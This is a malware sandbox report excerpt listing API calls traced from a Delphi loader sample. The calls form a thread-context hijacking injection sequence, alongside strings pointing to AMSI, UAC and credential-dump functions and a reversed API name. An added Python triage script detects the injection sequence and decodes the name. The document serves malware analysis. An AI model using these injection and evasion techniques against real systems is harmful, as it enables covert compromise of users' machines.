                                        • GetThreadContext.KERNEL32(00000000,02B91420,ScanString,02B913A4,02B4A77C,UacInitialize,02B913A4,02B4A77C,ScanBuffer,02B913A4,02B4A77C,ScanBuffer,02B913A4,02B4A77C,UacInitialize,02B913A4), ref: 02B49442
                                          • Part of subcall function 02B479B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B47A27
                                          • Part of subcall function 02B47D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B47D74
                                        • SetThreadContext.KERNEL32(00000000,02B91420,ScanBuffer,02B913A4,02B4A77C,ScanString,02B913A4,02B4A77C,Initialize,02B913A4,02B4A77C,00000000,-00000008,02B914F8,00000004,02B914FC), ref: 02B4A157
                                        • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02B91420,ScanBuffer,02B913A4,02B4A77C,ScanString,02B913A4,02B4A77C,Initialize,02B913A4,02B4A77C,00000000,-00000008,02B914F8), ref: 02B4A164
                                          • Part of subcall function 02B487A0: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02B913A4,02B4A3C7,ScanString,02B913A4,02B4A77C,ScanBuffer,02B913A4,02B4A77C,Initialize,02B913A4,02B4A77C,UacScan), ref: 02B487B4
                                          • Part of subcall function 02B487A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B487CE
                                          • Part of subcall function 02B487A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02B913A4,02B4A3C7,ScanString,02B913A4,02B4A77C,ScanBuffer,02B913A4,02B4A77C,Initialize), ref: 02B4880A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                         • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: Library$Thread$ContextFreeLoadMemoryVirtual$AddressAllocateProcResumeWrite
                                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                        • API String ID: 4180202596-51457883
                                        • Opcode ID: 280bc9d1e09f313a85732776cc5bc5b6c7e4a32e1f168820fe60582a1a810a08
                                        • Instruction ID: 64deb1f73cb5649dd8f6f06e36520b1b4f5b5ffba0e8b5bb2e4fe10abd7af430
                                        • Opcode Fuzzy Hash: 280bc9d1e09f313a85732776cc5bc5b6c7e4a32e1f168820fe60582a1a810a08
                                        • Instruction Fuzzy Hash: D7E21A75A901189FDB22FBA4CDE0EDE73BAAF89310F1045E1E149AB314DE30AE459F51
                                        APIs
                                          • Part of subcall function 02B48824: LoadLibraryA.KERNEL32(00000000,00000000,02B4890B), ref: 02B48858
                                          • Part of subcall function 02B48824: FreeLibrary.KERNEL32(74FA0000,00000000,02B91388,Function_000065D8,00000004,02B91398,02B91388,05F5E0FF,00000040,02B9139C,74FA0000,00000000,00000000,00000000,00000000,02B4890B), ref: 02B488EB
                                        • GetThreadContext.KERNEL32(00000000,02B91420,ScanString,02B913A4,02B4A77C,UacInitialize,02B913A4,02B4A77C,ScanBuffer,02B913A4,02B4A77C,ScanBuffer,02B913A4,02B4A77C,UacInitialize,02B913A4), ref: 02B49442
                                          • Part of subcall function 02B479B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B47A27
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                         • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: Library$AllocateContextFreeLoadMemoryThreadVirtual
                                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                        • API String ID: 4236972194-51457883
                                        • Opcode ID: ddd48761387a193ad62b4df4a95ba19f8621d431c9d44f28d5569e076873dbc0
                                        • Instruction ID: b713f3b56341368a51d50c513ef764af015a259c6bcb23d6d46cfc5a97e8e827
                                        • Opcode Fuzzy Hash: ddd48761387a193ad62b4df4a95ba19f8621d431c9d44f28d5569e076873dbc0
                                        • Instruction Fuzzy Hash: 29E21A75A901189FDB22FBA4CDE0EDE73BAAF89310F1045E1E149AB314DE30AE459F51
                                        APIs
                                        • GetModuleHandleA.KERNEL32(kernel32.dll,02B36BD0,02B30000,02B5D790), ref: 02B358D1
                                        • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02B358E8
                                        • lstrcpynA.KERNEL32(?,?,?), ref: 02B35918
                                        • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02B36BD0,02B30000,02B5D790), ref: 02B3597C
                                        • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02B36BD0,02B30000,02B5D790), ref: 02B359B2
                                        • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02B36BD0,02B30000,02B5D790), ref: 02B359C5
                                        • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B36BD0,02B30000,02B5D790), ref: 02B359D7
                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B36BD0,02B30000,02B5D790), ref: 02B359E3
                                        • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B36BD0,02B30000), ref: 02B35A17
                                        • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B36BD0), ref: 02B35A23
                                        • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02B35A45
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                         • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                        • String ID: GetLongPathNameA$\$kernel32.dll
                                        • API String ID: 3245196872-1565342463
                                        • Opcode ID: 1ae536cdbea6963e06e317f39906551a241c21be159b7231cbbfc4beba7f2c3f
                                        • Instruction ID: d90793b21f2e1773d070cf190f12ff3a0edaedad4358f4a8459c73f98270190d
                                        • Opcode Fuzzy Hash: 1ae536cdbea6963e06e317f39906551a241c21be159b7231cbbfc4beba7f2c3f
                                        • Instruction Fuzzy Hash: 5B416F71D00659AFDB22DAE8CC88ADEB7BDEF08350F4445E5E598E7241D770AB448F50
                                        APIs
                                        • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B35B94
                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B35BA1
                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B35BA7
                                        • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B35BD2
                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B35C19
                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B35C29
                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B35C51
                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B35C61
                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B35C87
                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B35C97
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                         • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                        • API String ID: 1599918012-2375825460
                                        • Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                        • Instruction ID: 13cf925b2f0423cbffb713e3e736c604a8e200a0e7716b6754f38f65ec2e4e3e
                                        • Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                        • Instruction Fuzzy Hash: FB315771E5021C6AEB37DAB89C45FDF77AD9B04384F8441E19648E6181EB749E848F50
                                        APIs
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B48090,?,?,00000000,?,02B47A06,ntdll,00000000,00000000,02B47A4B,?,?,00000000), ref: 02B4805E
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNELBASE(?), ref: 02B48072
                                          • Part of subcall function 02B480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B48150,?,?,00000000,00000000,?,02B48069,00000000,KernelBASE,00000000,00000000,02B48090), ref: 02B48115
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B4811B
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(?,?), ref: 02B4812D
                                        • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B4838D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                         • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: HandleModule$AddressProc$MemoryProtectVirtual
                                        • String ID: ntdll$yromeMlautriVtcetorPtN
                                        • API String ID: 3897345246-351734974
                                        • Opcode ID: aa607433c180f8f78d039055462de0b104c5bf7bb35e948f4587bf634ba18a08
                                        • Instruction ID: 559c5ef4c5b98d223974c0849f4f76a614a3c19785603aa687be66da1cc8dfd1
                                        • Opcode Fuzzy Hash: aa607433c180f8f78d039055462de0b104c5bf7bb35e948f4587bf634ba18a08
                                        • Instruction Fuzzy Hash: AD012575614208BFEB01EFA8DC81E9E77BEEB4D754F5188A0F504E7A50CA30A910AB20
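The two findings an analyst takes from this part of the listing are the thread-context hijacking sequence in the function at 02B49442/02B4A157/02B4A164 (GetThreadContext, NtAllocateVirtualMemory, NtWriteVirtualMemory, SetThreadContext, NtResumeThread) and the reversed API name `yromeMlautriVtcetorPtN`, which the function above resolves from `ntdll` before calling NtProtectVirtualMemory. The script below is an added triage example, not Joe Sandbox output and not DBatLoader or Remcos code: it parses API lines in the report's own format, checks the listing for that injection stage sequence, and decodes `$`-separated strings that are reversed names of sensitive APIs. The sample lines are abridged copies of the report lines above, embedded as constructed input; the stage table and the `SENSITIVE_APIS` set are the author's own choices, not something the report defines.

```python
"""Added triage example for Joe Sandbox-style API listings (not report or malware code)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# One API line of the report, with or without the "Part of subcall function" prefix, e.g.
#   • SetThreadContext.KERNEL32(00000000,02B91420), ref: 02B4A157
#     • Part of subcall function 02B479B4: NtAllocateVirtualMemory.NTDLL(?,?), ref: 02B47A27
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>[^(]+)\((?P<args>.*)\), ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                # address of the call site
    subcall: Optional[str]  # caller listed as "Part of subcall function", if any


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse report lines in listing order; lines that are not API calls are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = m["args"].split(",") if m["args"] else []
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16), m["sub"]))
    return calls


# Stages of thread-context hijacking (assumption); each stage accepts Nt* or Win32 spellings.
HIJACK_STAGES = [
    {"GetThreadContext", "Wow64GetThreadContext"},
    {"NtAllocateVirtualMemory", "VirtualAllocEx"},
    {"NtWriteVirtualMemory", "WriteProcessMemory"},
    {"SetThreadContext", "Wow64SetThreadContext"},
    {"NtResumeThread", "ResumeThread"},
]


def find_thread_hijack(calls: List[ApiCall]) -> List[ApiCall]:
    """Return the calls that complete every stage in listing order, or [] if a stage is missing."""
    stage, hits = 0, []
    for c in calls:
        if c.api in HIJACK_STAGES[stage]:
            hits.append(c)
            stage += 1
            if stage == len(HIJACK_STAGES):
                return hits
    return []


# APIs worth recognising even when their name string is obfuscated (assumption).
SENSITIVE_APIS = {
    "NtProtectVirtualMemory", "NtAllocateVirtualMemory", "NtWriteVirtualMemory",
    "NtReadVirtualMemory", "NtOpenProcess", "NtResumeThread",
    "GetThreadContext", "SetThreadContext", "CreateToolhelp32Snapshot",
    "MiniDumpWriteDump", "LoadLibraryA", "GetProcAddress",
}


def decode_reversed_api_names(string_id: str) -> Dict[str, str]:
    """Map each '$'-separated string that is a reversed sensitive API name to its plaintext."""
    return {s: s[::-1] for s in string_id.split("$") if s[::-1] in SENSITIVE_APIS}


def triage(listing: str, string_id: str) -> Dict[str, object]:
    """Run both checks and return a small findings record."""
    calls = parse_api_lines(listing)
    hijack = find_thread_hijack(calls)
    return {
        "calls": len(calls),
        "thread_hijack_refs": [f"{c.ref:08X}" for c in hijack],
        "reversed_api_names": decode_reversed_api_names(string_id),
    }


# Constructed sample: abridged copies of the injection function's lines from the report.
SAMPLE_LISTING = r"""
  • Part of subcall function 02B48824: LoadLibraryA.KERNEL32(00000000,00000000,02B4890B), ref: 02B48858
• GetThreadContext.KERNEL32(00000000,02B91420,ScanString,02B913A4), ref: 02B49442
  • Part of subcall function 02B479B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B47A27
  • Part of subcall function 02B47D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B47D74
• SetThreadContext.KERNEL32(00000000,02B91420,ScanBuffer,02B913A4,-00000008), ref: 02B4A157
• NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02B91420), ref: 02B4A164
  • Part of subcall function 02B487A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B487CE
"""
SAMPLE_STRING_ID = "ntdll$yromeMlautriVtcetorPtN"

if __name__ == "__main__":
    print(triage(SAMPLE_LISTING, SAMPLE_STRING_ID))
```

The stage check deliberately follows listing order rather than call-site address, because the Nt* calls here sit in subcalls at other addresses; a real report would also be scanned for the same sequence spread across GetProcAddress-resolved stubs, which this example does not attempt.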
                                        APIs
                                        • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02B37F7D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                         • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: DiskFreeSpace
                                        • String ID:
                                        • API String ID: 1705453755-0
                                        • Opcode ID: 60a0a3317bc6745db68fd0609a05e035b6386226a90ab679635ab5dbfaeb8164
                                        • Instruction ID: b7aaabd485317f555b08eaffbd1a95ab9062fc44c634bb4ab5cbe6a8ac849ec6
                                        • Opcode Fuzzy Hash: 60a0a3317bc6745db68fd0609a05e035b6386226a90ab679635ab5dbfaeb8164
                                        • Instruction Fuzzy Hash: DF11C0B5A00209AF9B05CF99C9819EFF7F9EFCC704B14C569A505EB254E671AA018B90
                                        APIs
                                        • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B3A76A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                         • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID:
                                        • API String ID: 2299586839-0
                                        • Opcode ID: 2128b34291823b7b3d39fc22196f9eeb1ad11300c5a3118c73b07de52b1b2571
                                        • Instruction ID: 28944400958a7174c7110dc21b22d1af0e60cf65ca053054a78d97ce00966b94
                                        • Opcode Fuzzy Hash: 2128b34291823b7b3d39fc22196f9eeb1ad11300c5a3118c73b07de52b1b2571
                                        • Instruction Fuzzy Hash: 7EE0D836B0021457D313A5585C81DF6B36D975C350F1041FEBD44C7341EEB0AD404AE9
                                        APIs
                                        • GetVersionExA.KERNEL32(?,02B5C106,00000000,02B5C11E), ref: 02B3B722
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                         • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: Version
                                        • String ID:
                                        • API String ID: 1889659487-0
                                        • Opcode ID: b0f7b1f71f23c768f2bdc5ef7ac9ac8f3f3c54c41cb6758749383d89a527dffd
                                        • Instruction ID: ba52b5678b0940e6d5c79c8d699a62114fcc4e8ac6e6c3d83647de725900b323
                                        • Opcode Fuzzy Hash: b0f7b1f71f23c768f2bdc5ef7ac9ac8f3f3c54c41cb6758749383d89a527dffd
                                        • Instruction Fuzzy Hash: E2F03478904312DFC340DF28D541B197BE5FB49B84F808AA9E898CB3A0E7349864CF12
                                        APIs
                                        • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02B3BDFA,00000000,02B3C013,?,?,00000000,00000000), ref: 02B3A7AB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                         • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID:
                                        • API String ID: 2299586839-0
                                        • Opcode ID: 23fe133b6f3189abf78f0258856cb74c0ef8cfe774ed9d6b2b97d20fe01198e3
                                        • Instruction ID: 060bdb76e626cb95cc2c41c7f09e835423856eeee6d79e1445a232e16d24fc82
                                        • Opcode Fuzzy Hash: 23fe133b6f3189abf78f0258856cb74c0ef8cfe774ed9d6b2b97d20fe01198e3
                                        • Instruction Fuzzy Hash: 50D05EB630E2607AA221515A2D94DBB7AECCBC97A1F1080BEF588C6240D6008C0696B5
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                         • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: LocalTime
                                        • String ID:
                                        • API String ID: 481472006-0
                                        • Opcode ID: b1eecd68d2e37ad01dc8be627e7f9539d8c1b79e2157fe00e2d627bfaf393da5
                                        • Instruction ID: 534e1da22e05ee1bb0e832dcbf8ea8fa0e31fe8c6d09332e326bbba96f6c3039
                                        • Opcode Fuzzy Hash: b1eecd68d2e37ad01dc8be627e7f9539d8c1b79e2157fe00e2d627bfaf393da5
                                        • Instruction Fuzzy Hash: 5CA01200404C2011854037190C0217531445900620FC40F8068F8402D0ED1D012040D7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                         • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 50c1d5995af9305e0791e78fcf54c19accc4d0414a42f5e18d00d25cb56bdd24
                                        • Instruction ID: c759e8e75f95dc47f2d3bbc2cf1d2a3b44799bb7569a75e985a7ffea6fae7f9f
                                        • Opcode Fuzzy Hash: 50c1d5995af9305e0791e78fcf54c19accc4d0414a42f5e18d00d25cb56bdd24
                                        • Instruction Fuzzy Hash: 7651419245E3D24FC7635F7494A53C33FA4AE3722474E56DAC8D48F1A3E209494BCB62
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                         • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
